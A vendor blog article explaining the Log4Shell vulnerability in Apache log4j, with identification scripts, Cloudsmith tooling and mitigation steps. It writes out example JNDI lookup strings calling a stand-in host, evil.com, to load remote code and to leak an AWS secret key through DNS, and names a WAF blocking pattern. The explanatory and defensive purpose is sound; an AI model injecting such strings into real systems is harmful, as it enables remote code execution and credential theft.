Log4Shell Explained

This article discusses the background, impact, identification, and mitigation of Log4Shell, one of the worst vulnerabilities to arise in the past decade. Here at Cloudsmith, security and privacy are paramount. As a hosted package management service helping customers distribute millions of packages worldwide, we're part of the story for securing software supply chains. Read on to learn what Log4Shell is, how the vulnerability works, and what you can do to protect yourself and your users.

What is Log4Shell?

The log4j library, part of the Apache Software Foundation (ASF), is a general and commonly utilized logging framework used by Java developers worldwide. The framework allows developers to log data (including user-sourced information) in their applications.

On 10th December 2021, a critical-severity Remote Code Execution (RCE) exploit in log4j was disclosed as CVE-2021-44228, affecting versions below 2.15.0. The vulnerability was nicknamed Log4Shell to imply that exploiting it results in a shell (login) on a server.

Due to the widespread deployment of Java applications that use log4j, many sources have characterized the exploit as one of the most impactful of the last decade. For example, Tenable described it as the "single biggest, most critical vulnerability of the last decade".

Before disclosure as CVE-2021-44228, the exploit came to the attention of developers everywhere as a Minecraft-specific attack that used crafted strings to execute code on the Minecraft server, as shown in the following tweet, dated 9th December 2021:

However, as hinted in the above tweet, it was suspected at the time that the impact reached far beyond Minecraft alone. Then, following disclosure, CVE-2021-44228 confirmed the alleged impact on servers and services worldwide.

According to a tweet by Matthew Prince, CEO of Cloudflare, the earliest attacks that Cloudflare had seen began on 1st December 2021. This evidence indicates that the exploit was "in the wild" for at least nine days before the public CVE disclosure.

Since the disclosure, the major enterprises affected have included Apple, Amazon, Cloudflare, Steam, Tesla, Twitter, and Baidu. So even if you are not directly impacted, there is a high chance that someone in your supply chain is, or already has been.

Just how bad is the log4j exploit?

Extremely bad; as bad as possible (or perhaps even worse). The exploit, disclosed as CVE-2021-44228 and referred to as Log4Shell, affects log4j versions below 2.15.0. Apache assigned a Common Vulnerability Scoring System (CVSS) score of 10 (the highest available) because the exploit enables both full Remote Code Execution (RCE) and data exfiltration.

Given specially crafted strings, log4j below version 2.15.0 performs network-based lookups of objects from URLs using the Java Naming and Directory Interface (JNDI). One of the supported protocols is the Lightweight Directory Access Protocol (LDAP), which can retrieve data from arbitrary URLs for evaluation and execution, either local to the server or remote.

In its default configuration, log4j will perform string interpolation (substitution) for special lookup variables in the form of ${<prefix>:<data>}, such as replacing ${date:yyyy-MM-dd} with the date 2021-12-10. Using the JNDI, with an expression such as ${jndi:ldap://evil.com/bad/payload}, it then becomes possible to load and execute arbitrary code from evil.com/bad/payload.
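To make the lookup syntax concrete, here is a minimal Bash sketch that lists the ${<prefix>:<data>} expressions found in a piece of text. The function name extract_lookups and its regular expression are assumptions made for illustration; this is not how log4j itself parses messages, and nested expressions are deliberately not handled.

```bash
#!/bin/bash
# Hypothetical helper (not part of log4j): print each simple
# ${<prefix>:<data>} expression found on stdin, one per line.
# Nested lookups such as ${a:${b:c}} are NOT handled correctly.
extract_lookups() {
  # `|| true` keeps the exit status at 0 when nothing matches.
  grep -oE '\$\{[A-Za-z0-9]+:[^}]*\}' || true
}

# Example: a log line carrying a JNDI lookup and a date lookup.
printf '%s\n' 'agent=${jndi:ldap://evil.com/bad/payload} on ${date:yyyy-MM-dd}' \
  | extract_lookups
```

For the example line, this prints the two expressions ${jndi:ldap://evil.com/bad/payload} and ${date:yyyy-MM-dd} on separate lines. A pattern this simple is only useful for understanding the syntax; it will miss obfuscated variants.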

The Naked Security by Sophos blog provides an example of this. They use ncat (a well-known networking utility) to open a listening socket that reflects data to an exploitable server. If the data returned is also well-crafted JNDI data, then it will be evaluated as code executed in the context of the application's environment. Visualization provided by the Juniper Threat Labs blog shows the workflow in practice:

The result of the above code execution is that attackers can run any piece of arbitrary code that they choose. It will run in the same context as your application, enjoying all of the same access and privileges. The practical (but malicious) outcomes are almost limitless, from "simple" database dumps, login shells, botnets, and unsolicited spam through to the dangerous (e.g. targeting public infrastructure).

Beyond the use of JNDI LDAP, additional protocols may be subject to exploitation, such as Java Remote Method Invocation (RMI), the well-known Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP). Juniper confirmed this by reporting a shift from JNDI LDAP to RMI attacks, resulting in more sophisticated payloads. So the risk remains high.

Although a setting can mitigate code execution, Daniel Miessler of Unsupervised Learning has shown that it is still possible to exfiltrate data with other techniques, such as interpolation into DNS lookups. For example, the expression ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.evil.com}, if evaluated, will exfiltrate the contents of the AWS_SECRET_ACCESS_KEY environment variable, because its value becomes part of the hostname that the server tries to resolve.
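The substitution order is what makes this leak possible, and it can be imitated in a few lines of Bash. The sketch below is purely illustrative and is not log4j code: the function expand_env_lookups and the variable DEMO_SECRET are made-up names, and only ${env:NAME} expressions are handled.

```bash
#!/bin/bash
# Illustration only, NOT log4j code: mimic how nested ${env:NAME} lookups
# would be substituted before the outer lookup is resolved.
expand_env_lookups() {
  local text=$1 name needle
  local re='\$\{env:([A-Za-z_][A-Za-z0-9_]*)\}'
  while [[ $text =~ $re ]]; do
    name=${BASH_REMATCH[1]}
    needle="\${env:${name}}"
    # Substitute every occurrence with the variable's current value.
    text=${text//"$needle"/"${!name}"}
  done
  printf '%s\n' "$text"
}

# DEMO_SECRET is a made-up variable standing in for a real secret.
export DEMO_SECRET=abc123
expand_env_lookups '${jndi:ldap://${env:DEMO_SECRET}.evil.com}'
```

The call prints ${jndi:ldap://abc123.evil.com}, showing that the secret ends up inside the hostname. A DNS query for that hostname is enough to disclose the value, even if no code is ever loaded.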

Therefore, despite the assistance of mitigations other than version upgrades, such as implementing rules in Web Application Firewalls (WAFs), disabling JNDI URL-based lookups, or even controlling egress from servers, there is still a considerable risk of impact. The best mitigation route is to upgrade dependencies, shut down (block) installations of impacted log4j versions, and examine servers for existing exploitation.

In summary, the reason that log4j was assigned a CVSS rating of 10 (again, the highest possible) is that:

The log4j library is highly commonly used and widespread in the Java community.
The attack enables Remote Code Execution in the context of servers and applications.
It also allows data exfiltration, in which bad actors can steal server-side secrets.
It is reasonably easy to exploit, with little practical knowledge required to do so.
Mitigations other than version upgrades (which aren't always easy) don't fully protect.
Therefore, the attack surface area is unfathomably large and carries a similar impact.

So yes, as stated by others in the community, this vulnerability is one of the most significant and most impactful ever seen. As stated by Sophos, it is (sadly) ironic that the data being logged is probably for auditing or security purposes. However, now is the time to do everything in our collective power to protect our servers, applications, users, businesses, and even our entire ecosystem.

It's a tough ask, but we're here to help.

What else do I need to know?

Patches for log4j have been released to mitigate the vulnerability, in the form of the 2.15.0 (initially) then 2.16.0 and 2.17.0 releases.

However, 2.15.0 and 2.16.0 have known Denial of Service [DoS] vulnerabilities, cited in CVE-2021-45046 and CVE-2021-45105. Therefore, the current (as of 21st December 2021) recommendation for mitigation is to update log4j dependencies to at least version 2.17.0.

How can I identify affected packages?

In all use-cases, identification of affected software will involve examining packages for dependencies on log4j with the following attributes (expressed in terms of Maven-based GAV coordinates):

GroupID: org.apache.logging.log4j
ArtifactID: log4j* (or more specifically, log4j-core)
Version: Generally below 2.17.0 (but specifically for CVE-2021-44228, below 2.15.0)
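
The version thresholds above can be checked mechanically. The following Bash sketch assumes GNU coreutils (for sort -V) and plain numeric 2.x versions under the GroupID above; the function names version_lt and classify_log4j_version are hypothetical, and pre-release qualifiers such as -rc1 or -beta9 are not handled.

```bash
#!/bin/bash
# Hypothetical helper: succeed (exit 0) when version $1 is strictly below
# version $2. Relies on `sort -V` (version sort), a GNU coreutils extension.
version_lt() {
  [ "$1" != "$2" ] &&
    [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# Classify a log4j 2.x version against the thresholds named in this article.
classify_log4j_version() {
  if version_lt "$1" 2.15.0; then
    echo "affected by CVE-2021-44228"
  elif version_lt "$1" 2.17.0; then
    echo "upgrade recommended"
  else
    echo "meets the 2.17.0 recommendation"
  fi
}

classify_log4j_version 2.14.1
```

For 2.14.1 this prints "affected by CVE-2021-44228". Version sort is used instead of a plain string comparison so that, for example, 2.9.1 is correctly treated as older than 2.15.0.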

Identification For Maven Users

You can use the Maven Dependency plugin to locate the direct and transitive dependencies of local software packages. For example, you can filter the dependency tree to find log4j usage:

$ mvn dependency:tree -Dincludes=org.apache.logging.log4j

Which will output something like:

[INFO] [dependency:tree]
[INFO] com.yourcompany.aggregator:aggregator-plugin:2.0.5
[INFO] \- org.apache.logging.log4j:log4j:jar:2.14.1
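
If you need just the artifact names and versions from that output, a small filter can pull them out. This is a sketch under assumptions: the function name list_log4j_versions is made up, and it expects coordinates of the form groupId:artifactId:type:version with an optional trailing scope, so coordinates that include a classifier would be misread.

```bash
#!/bin/bash
# Hypothetical helper: read `mvn dependency:tree` output on stdin and print
# "artifactId version" for each org.apache.logging.log4j dependency.
# Assumes coordinates shaped like groupId:artifactId:type:version[:scope].
# Usage: mvn dependency:tree -Dincludes=org.apache.logging.log4j | list_log4j_versions
list_log4j_versions() {
  grep -oE 'org\.apache\.logging\.log4j:[^: ]+:[^: ]+:[^: ]+' \
    | awk -F: '{ print $2, $4 }' \
    | sort -u
}

# Example using a line like the sample output above.
printf '%s\n' '[INFO] \- org.apache.logging.log4j:log4j:jar:2.14.1' \
  | list_log4j_versions
```

For the sample line this prints "log4j 2.14.1". Duplicates are collapsed with sort -u because the same dependency often appears several times in a multi-module tree.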

Identification For Cloudsmith Users

We released additional functionality to search for dependencies such as log4j across packages stored within Cloudsmith repositories. The syntax is dependency:<name>, so to search for log4j dependencies, you specify dependency:log4j. The functionality is available via the UI, the API and the CLI.

For example, you can search via the CLI using:

$ cloudsmith ls packages {account}/{repo} -q "dependency:log4j"
Getting list of packages ... OK
Name                       | Version | Status    | Owner / Repository (Identifier)
spring-boot-starter-log4j2 | 2.6.1   | Completed | you/your-repo/URjuLZOWzKjW
Results: 1-1 (1) of 1 package visible (page: 1/1, page size: 30)

The above only tells you which packages have a direct (non-transitive) dependency on log4j; it doesn't (yet) allow a search on versions (note: concrete versions are not always known in a repository). However, if you're utilizing Cloudsmith as a proper Single Source of Truth and store all packages that your applications utilize, then it is possible to detect all uses of log4j (because it will be visible across all packages used).

Using the new package dependencies API, you can confirm the versions of those dependencies. The functionality is also available via the latest Cloudsmith CLI release, 0.31.1, which includes a new dependencies sub-command that can be used to list dependencies for a package. For example, using the "identifier" for the package from above:

$ cloudsmith deps your-account/your-repo/URjuLZOWzKjW
Getting direct (non-transitive) dependencies of URjuLZOWzKjW in your-account/your-repo ... OK
Type    | Name                                       | Operator | Version
Compile | org.apache.logging.log4j:log4j-core        | >=       | 2.14.1
Compile | org.apache.logging.log4j:log4j-jul         | >=       | 2.14.1
Compile | org.apache.logging.log4j:log4j-slf4j-impl  | >=       | 2.14.1
Compile | org.slf4j:jul-to-slf4j                     | >=       | 1.7.32
Results: 4 direct dependencies

You can always use a combination of these commands and the -F json (format as JSON) flag for scripting calls. So, for example, you could use the ls (list) command from the CLI to find packages that depend upon log4j and then the deps (dependencies) command to get the details.

For example, you can use the following (albeit, Linux-y) script to automate the generation of a Comma-Separated Value (CSV) report (disclaimer: this is a little hacked together, but should serve to demonstrate the point; if you get stuck, let us help you):

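#!/bin/bash
# list_log4j_deps.sh <account> [optional args]
# Writes a CSV report of log4j dependencies across all repositories in an account.
account=$1
args=${2:-""}  # left unquoted below on purpose, so several extra CLI args can be passed
echo "account,repository,package,dependency,operator,version"
# Outer loop: every repository in the account.
while IFS= read -r repository; do
  # Inner loop: every package in the repository that depends on log4j.
  while IFS= read -r identifier; do
    p="$account,$repository,$identifier"
    # Emit one CSV row per log4j dependency of the package.
    cloudsmith deps "$account/$repository/$identifier" -F json $args 2>/dev/null \
      | jq -r ".data[] | \"$p,\" + .name + \",\" + .operator + \",\" + .version" \
      | grep log4j
  done < <(
    cloudsmith ls pkg "$account/$repository" -q 'dependency:log4j' \
      -F json $args 2>/dev/null | jq -r ".data[] | .slug_perm"
  )
done < <(
  cloudsmith ls repo "$account" -F json $args 2>/dev/null | jq -r ".data[] | .slug"
)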

Which will result in something like:

$ bash list_log4j_deps.sh your-account
account,repository,package,dependency,operator,version
your-account,repo,URjuLZOWzKjW,org.apache.logging.log4j:log4j-core,>=,2.14.1
your-account,repo,URjuLZOWzKjW,org.apache.logging.log4j:log4j-jul,>=,2.14.1
your-account,repo,URjuLZOWzKjW,org.apache.logging.log4j:log4j-slf4j-impl,>=,2.14.1

Finally, if you're looking to automate the scripting but don't want to use the Python-based Cloudsmith CLI, you can also achieve the same result by executing queries against the Cloudsmith APIs.

How can I prevent installs of `log4j`?

For Cloudsmith users, a recently added repository feature prevents installs of impacted versions of log4j. The blocking functionality is currently a bespoke feature that services log4j only; it will (eventually) evolve into a more generalized quarantine/risk/controls feature. You can enable blocking in any Cloudsmith repository on the settings page. It looks like:

As stated, this functionality will automatically block log4j-related downloads unless they meet a specific version constraint. The blocking applies to both local (cached) and upstream packages. A package is considered related to log4j if the GroupID is org.apache.logging.log4j and the ArtifactID contains log4j (e.g. log4j-core).
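
The matching rule can be restated as a small shell predicate. This is only a re-expression of the rule as described above, not Cloudsmith's implementation; the function name is_log4j_related is hypothetical, and the version constraint is left out because it is not specified here.

```bash
#!/bin/bash
# Hypothetical re-statement of the matching rule described above; this is
# NOT Cloudsmith's implementation. Succeeds when the GroupID is exactly
# org.apache.logging.log4j and the ArtifactID contains "log4j".
is_log4j_related() {
  [ "$1" = "org.apache.logging.log4j" ] || return 1
  case $2 in
    *log4j*) return 0 ;;
    *) return 1 ;;
  esac
}

if is_log4j_related org.apache.logging.log4j log4j-core; then
  echo "log4j-core: related"
fi
```

Note that both conditions must hold: an artifact such as org.slf4j:log4j-over-slf4j contains "log4j" in its name but has a different GroupID, so it would not match.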

How can I mitigate the Log4Shell vulnerability?

Primarily, by following the mitigation advice given by Apache:

Identify applications utilizing log4j dependencies below 2.15.0 (as above).
Upgrade log4j dependencies to at least version 2.17.0 (2.15.0 and 2.16.0 have known Denial of Service [DoS] vulnerabilities, cited in CVE-2021-45046 and CVE-2021-45105, so the recommendation by Apache is to use 2.17.0 or above).

If you're unable to update dependencies, you can also utilize the following mitigations (but bear in mind that the primary mitigation is still to upgrade dependencies, and these are not foolproof either, as demonstrated above re: Daniel Miessler of Unsupervised Learning):

For applications that use log4j 2.10 or above, you can mitigate the issue by setting the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For example:
Via property: java -Dlog4j2.formatMsgNoLookups=true ...
Via environment: LOG4J_FORMAT_MSG_NO_LOOKUPS=true java ...
For applications that use log4j between >=2.7 and <=2.14.1, you can mitigate by removing org/apache/logging/log4j/core/lookup/JndiLookup.class from the classpath. For example:
By executing: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
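
After removing the class, it is worth confirming that it is really gone. The sketch below assumes you can produce a listing of the jar's contents with a tool such as unzip -l or jar tf; the function name has_jndi_lookup and the jar filename in the usage comment are illustrative only.

```bash
#!/bin/bash
# Hypothetical helper: read an archive listing on stdin (for example from
# `unzip -l` or `jar tf`) and succeed if the JndiLookup class is still present.
has_jndi_lookup() {
  grep -qF 'org/apache/logging/log4j/core/lookup/JndiLookup.class'
}

# Usage (the jar filename is an assumption):
#   if unzip -l log4j-core-2.14.1.jar | has_jndi_lookup; then
#     echo "JndiLookup.class is still present"
#   fi
```

Bear in mind that log4j-core may also be bundled inside other archives (such as fat jars), which a check against a single file will not see.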

In addition to those, there are also additional techniques available to reduce the exploit potential:

For applications behind a Web Application Firewall (WAF), your provider may have (or will be releasing) additional rules to prevent exploitation. The idea is to block requests containing ${jndi:ldap:// (although it won't be foolproof). For example, AWS has updated its WAF ruleset AWSManagedRulesKnownBadInputsRuleSet to include dynamic prevention.
It may also be possible to mitigate exploits by blocking egress/outbound connections destined for LDAP or RMI or any type of traffic other than necessary. However, this might not prevent all kinds of attacks. The JNDI interface supports multiple protocols, and even executing a DNS lookup can leak information.

Summary

The log4j vulnerability is a critical security risk that can lead to Remote Code Execution (RCE) and, as such, should not be taken lightly. Due to the widespread use of log4j across many enterprises, projects, and organizations, the blast radius is one of the largest ever seen.

You should take all steps necessary to mitigate this vulnerability as quickly as possible, and we empathize with all those affected by it. It's another reminder of how critical software supply chain security is and how great the exposure can be when a critical exploit emerges in the wild.

If you have any questions about the exploit, need any additional help with identification or mitigation, or have any general concerns, please don't hesitate to contact us. As previously mentioned, this is a bad one, so #hugops to all involved worldwide.

Next Steps with Cloudsmith

If you're not currently with Cloudsmith, it's easy to take the next step. You can start a free trial immediately and spin up a repository within 60 seconds, or contact us to set up a no-fuss demo session with our team.

Cloudsmith is the most cloud-native, universal package management service on the planet, but don't just take our word for it. Join us and take back control of your software supply chain today!
